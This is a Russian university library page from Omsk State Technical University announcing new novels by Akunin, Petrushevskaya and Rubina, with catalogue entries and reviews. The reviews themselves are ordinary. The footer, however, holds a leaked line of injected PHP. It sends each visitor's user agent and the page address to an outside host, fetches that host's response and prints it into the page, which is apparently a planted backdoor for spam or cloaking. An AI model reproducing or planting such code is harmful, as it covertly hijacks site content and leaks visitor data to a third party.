Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

246 пользователей



 
      Наши партнеры
Студенческий информационный портал компании

: Март

Приобретение отделом художественной литературы новых книг известных, любимых и читаемых авторов - всегда событие. Так, наши читатели могут познакомиться с новыми произведениями Бориса Акунина «Смерть на брудершафт», Людмилы Петрушевской «Жизнь это театр», Дины Рубиной «Почерк Леонардо».

VST=333
1. 
Акунин, Борис. Смерть на брудершафт [a] : роман-кино. Фильма 1 : Младенец и чертФильма 2 : Мука разбитого сердца, 2008. - 461, [3]4.
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ33

«Смерть на брудершафт» - название цикла из десяти повестей в новом жанре, призванном совместить литературный текст с визуальностью кинематографа. Сам Акунин назвал этот жанр «роман-кино». «Я придумал его сам, - сказал автор в одном из своих интервью, - так что это мой очередной эксперимент над моими бедными читателями. Так уж я устроен, что мне необходимо все время пробовать что-нибудь новое». И еще:

«Пусть у читателя в воображении включится собственный кинопроектор. С этой целью я изобрел всякие штуки и фокусы. Если, читая «Смерть на брудершафт», вы мысленно увидите кинокартинку, значит, метод работает. Помогают мне «операторы», то есть художники-иллюстраторы, которые рисуют для этого текстового кино стоп-кадры» с эффектом старой затертой пленки. Под «штучками и фокусами» автор подразумевает, видимо, и своеобразные титры, которые, как в немом синематографе, претворяют начало того или иного действия.

Теперь о сюжете. Выпить со смертью на брудершафт мало кому захочется, ну а уж жизнерадостному студенту, у которого и возлюбленная есть, и к пению талант, тем более. Но перо Бориса Акунина и события Первой мировой войны заставляют главного героя Алексея Романова заняться именно этим. В «фильме первой» «Младенец и черт» Романов знакомится с матерым контрразведчиком князем Козловским, который обучает его хитростям, необходимым для службы, а заодно и искусству любовному: как за девушкой ухаживать, какие цветы дарить, на сколько минут на свидание опаздывать. Волею судеб студент-математик оказался вовлечен в поимку немецкого шпиона. Шпиону удается уйти. Стремясь исправить свою ошибку, новоиспеченный помощник русской секретной службы всячески помогает контрразведке, поскольку только он знает означенного врага в лицо.

В «фильме второй» «Мука разбитого сердца» мучимый неудачей предыдущего столкновения с германской разведкой, Алексей добровольно уходит на фронт. Ранение, почти паралич правой руки, списан вчистую. За время пребывания на фронте невеста выходит замуж за другого. Для романтичного молодого человека это крах всего. Казалось бы, сохранившийся с мирных времен пистолет поставит точку в конце неудавшейся жизни. Но его услуги контрразведке не забыты, как не забыт и его прекрасный голос. Ему предстоит поездка в Швейцарию, где и дело государственной важности найдется, и сердце на время новую любовь обретет.

2. 
Акунин, Борис. Смерть на брудершафт [a] : роман-кино. Фильма 3 : Летающий слонФильма 4 : Дети Луны, 2008. - 380, [4]4.
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ43

Действие «фильмы третьей» и «фильмы четвертой» происходит в 1915 году. Это две самостоятельные повести о приключениях германского шпиона Зеппа и русского контрразведчика Романова. Итак, «Летающий слон». Первая Мировая война. Новое вискусстве войны —бои ведутся не только на земле, но и в воздухе. Но германскаяармия неожиданно утрачивает господство в небе из-за появления в российском арсенале нового многомоторного суперсамолета «Илья Муромец». Теперь спасти Германию от тотального поражения сможет только прирожденный шпион-диверсантЗепп, который выполняет задание: заставить Россию отказаться от производства«летающих этажерок».Только он сможет дискредитировать в глазах высочайшегоимператорского наблюдателя новую русскую прогрессивную технологию…

«Дети Луны», «фильма третья». Молодой контрразведчик Алексей Романов вновь оказывается главным героем очередного «шпионского» расследования. Для того, чтобы разоблачить германского агента, продающего врагу секретные сведения о диспозиции русской артиллерии, Алексею приходится перевоплотиться в «юного декадента» и внедриться в закрытое общество, собирающееся в клубе-кабаре «Дети луны»...

Несомненно, читатель будет сравнивать Алешу Романова с Эрастом Фандориным из предыдущих произведений Акунина. И надо сказать, что вышли они совсем непохожими. Темперамент Романова посильнее фандоринского будет. Но профессионализма Эраста Петровича у студента нет: если Фандорин «брал» врага нюхом сыщика, интуицией и нефритовыми четками, что думать помогают, то Алеша, напротив, опыта не имеет, и на помощь ему приходит случай. Да и живут герои в разных эпохах. Непохожи они, тем и интересны, тем неожиданнее их поступки. А потому читателям, которых тронули и зацепили приключения молодого, неопытного, но очень отважного контрразведчика, в заключение сообщаем, что «продолжение будетъ» - так по крайней мере обещает писатель Борис Акунин.

3. 
Петрушевская, Людмила Стефановна. Жизнь это театр [a] : рассказы и роман / Людмила Петрушевская, 2007. - 396, [2]4.
Оглавление 
  • Время ночь
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ1

Недавно Петрушевская выпустила антологию "my best" под авторским названием "Жизнь это театр". В нее вошли рассказы и роман "Время ночь", тот самый, что не получил в свое время Букера, зато его играют за рубежом как моноспектакль. Заглавие книги заимствовано из названия одного рассказа. Собственно, только в нем речь и идет о театре в традиционном смысле: сцена - режиссер - спектакль. Ясно, что писатель, выпускающий сборник, в какой-то мере является его режиссером. Выстраивает последовательность рассказов - назовем их сценами, предлагает какую-то завязку, развязку, кульминацию.

Из рассказа, давшего название книге: «жизнь это театр, только этот театр совершенно не годился для переноса на сцену, зритель бы плевался, во-первых, зачем мне это, я такой театр и дома каждый день вижу".

Короткие рассказы. В них - забавные персонажи, чудики и чудачки. Как на сцене театра-варьете, забавные номера: женятся, например, или влюбляются - мимолетно, случайно. А потом вдруг в какой-то неуловимый момент мир переворачивается. "Театр" персонажей становится жизнью.

И читатель — зритель вдруг понимает: это у них настоящая жизнь и настоящие чувства, а у тебя антреприза. И не ты на них, а они на тебя требовательно смотрят в упор и ждут чего-то. И свою собственную жизнь придется пересматривать заново после каждого короткого рассказа: а как бы я поступил в таких обстоятельствах?

Эти волшебные превращения и есть то главное, что не устает показывать в своем персональном театре Петрушевская.

Жизни Петрушевской, «цепляют за живое».Вот парикмахерши Светочка и Наташка из рассказа «Надька» выпивают после рабочего дня, «лепечут вздор, приплакивают, роняют пепел на стол, оттягивая жуткий момент возвращения домой, к мужьям», а «в огромной витрине течет мимо улица, старухи с сумками, молодежь с поклажей, дамы с собачками, мужики прутся, свободно развесив руки, шастают машины». И горькая выпивка эта, и улица за окном написаны, конечно, в общих чертах, но этого вполне достаточно тем, кто договорился, что жизнь такова.

Или рассказ «Шопен и Мендельсон». Пожилые муж с женой каждый вечер играют на пианино, мешая отдыхать соседке. Надоели ей старики так, что «можно убиться». И вот внезапно все кончилось и «спокойным образом можно было смотреть телевизор, петь или плясать, правда, кто-то отдаленно как бы плакал, как ребенок пищит выше этажами, но это тоже кончилось». Позже оказалось, что писк был не ребенка, а пытавшегося позвонить по телефону парализованного старика около своей умершей жены. Потому и музыка ежевечерняя смолкла. А соседка, вдруг оглушенная тишиной, с любовью и нежностью вспоминает «образованных, тихих стариков»...

«Цепляют за живое» все до одной истории, хотя ситуации возникают совершенно фантасмагорические. Молоденькая оперная певица, может, она из Большого театра, на курорте крутит романы с местной шпаной, режиссерша драмкружка больше всего на свете любит свою работу тире жизнь и еще очень хочет иметь ребенка, а когда это приходит, она принимает симптомы за смертельную опухоль, или негритянка Мара, одному богу известно откуда взявшаяся в русской провинции, сводит с ума местных девочек - бледных мышек. Какие-то немыслимые истории, и в то же время читаешь их и не замечаешь, как ты уже по ту сторону рампы.

В конце книги читателя ждет "Время ночь" - небольшой роман о несчастных женщинах времен развитого социализма, который уже 15 лет играют в виде моноспектакля по всему миру.

Итак,открываем книгу. Первый рассказ «Али-Баба». Читаем: «Они познакомились - так бывает - в очереди в пивбар. Она оглянулась и увидела синеглазого в финском костюме и с черными ресницами и решила: он будет мой..." Занавес поднят - представление началось. Определение «писатель-режиссер» работает.

Такой театр в реальной сцене не нуждается. Новый сборник Петрушевской- это своеобразный карманный театр, который всегда с тобой.

4. 
Рубина, Дина Ильинична. Почерк Леонардо [a] : роман / Дина Рубина, 2008. - 458, [2]4.
Ключевые слова 
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОХЛ11

Дина Рубина - писательница широко известная, любая ее новая книга - это событие в современной литературе. Новый ее роман называется "Почерк Леонардо". Вот здесь требуется пояснение. Леонардо да Винчи был левшой, предпочитая писать справа налево, так что прочесть его текст можно было только в зеркальном отражении.

Итак, бездетная семья интеллигентов, где жена - преподаватель истории музыки, а муж - врач, удочеряет девочку Аню. Ребенок после смерти матери отказался есть. Вообще. После невероятных усилий приемные родители возвращают Аню к нормальной жизни, но замечают за ней некоторые странности: она левша, предсказывает события, читает задом наперед, а написанное ею можно прочесть только в виде отражения в зеркале. Способности девочки проявляются после того, как ее, левшу, переучивают действовать правой рукой. Овладев обеими руками, она начинает поражать уникальными памятью и координацией, пользуется зеркальным письмом, находит себе учителя, помешанного на теориях зеркальных пространств.

Повзрослев, Аня поступает в цирковое училище. Теперь она циркачка, каскадер, искусница по части различных фокусов с зеркалами. Еще через несколько лет, уже расквитавшись с цирком и каскадерством, ездит по свету, устраивая чудесные шоу с зеркалами. Но главным остается то, что Аня - левша. Эта довольно распространенная аномалия и становится сюжетообразующим элементом романа. И суть не в том, что Анне удобнее писать справа налево, а в том, что вся ее жизнь и смерть становятся зеркальным отражением реальности, с которой героиня связана, но с которой не хочет мириться. С зеркалами у нее вообще особая история: ребенком после смерти матери она увидела, как посреди ночи мама уходит в зеркало и зовет дочь за собой. И с тех пор она стала питать к зеркалам особую привязанность. На почве же зеркал ее приемная мать сошла с ума. И отныне в зеркале всегда маячит образ ее мертвой матери, как бы зовущий, напоминающий о том, что жизнь Анны - чистой воды случайность, а вот смерть - единственный выход из зазеркалья жизни. И в ее гибель мало кто верит, многие считают, что она скрылась от мира, прорвавшись, наконец, в свое зазеркалье.

Дина Рубина написала свой первый мистический роман. Да, мистическая подоплека романа связана с зеркальностью. Но роман Рубиной все равно остается романом изысканно реалистическим. Киев, Московское цирковое училище, Монреаль, Франкфурт - всё в романе Рубиной играет красками живой жизни, людских судеб, запахов, диалогов, монологов со специфическим говорком. «Мне ужасно захотелось этой вкусной украинской речи, этого суржика, южнорусской украинской колористики».История гениальной девочки, умеющей заглядывать в будущее, погружена в два мира, безукоризненно освоенных автором. Это мир киевского мещанства и мир советского и постсоветского цирка. Первый автор знает по жизни, второй изучала специально для этого романа. « Мне же нужно было знать все: какого цвета покрытие кладут на опилки на арене, какого цвета бархатный занавес, бывает ли он пыльным, как часто его чистят и что на ногах — как это называется, как это надевается. Ведь познакомить со средой — честная работа честного писателя»...

Судьба главной героини предстает пред нами серией разновременных эпизодов – от обреченности трехлетнего ребенка в Ейском приюте до прыжка фантастической и роковой женщины с монреальского моста на мотоцикле. Все это время она ломала жизни тем, кто оказывался слишком близко. Ее любили и боялись, ее способности притягивали, а чудесный дар вызывал ужас. Поэтому она научилась его скрывать – больше всего ей хотелось стать обычным человеком. Перед нами история женщины, которая отвергает дар небес. Неприкаянная и несвободная, она летит по жизни и по миру, пытаясь убежать от своего случайного дара. Необыкновенный человек хочет быть обыкновенным, но это невозможно...



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2720 - 20.11.2018
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.92 с.10 запросов, 0.57c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;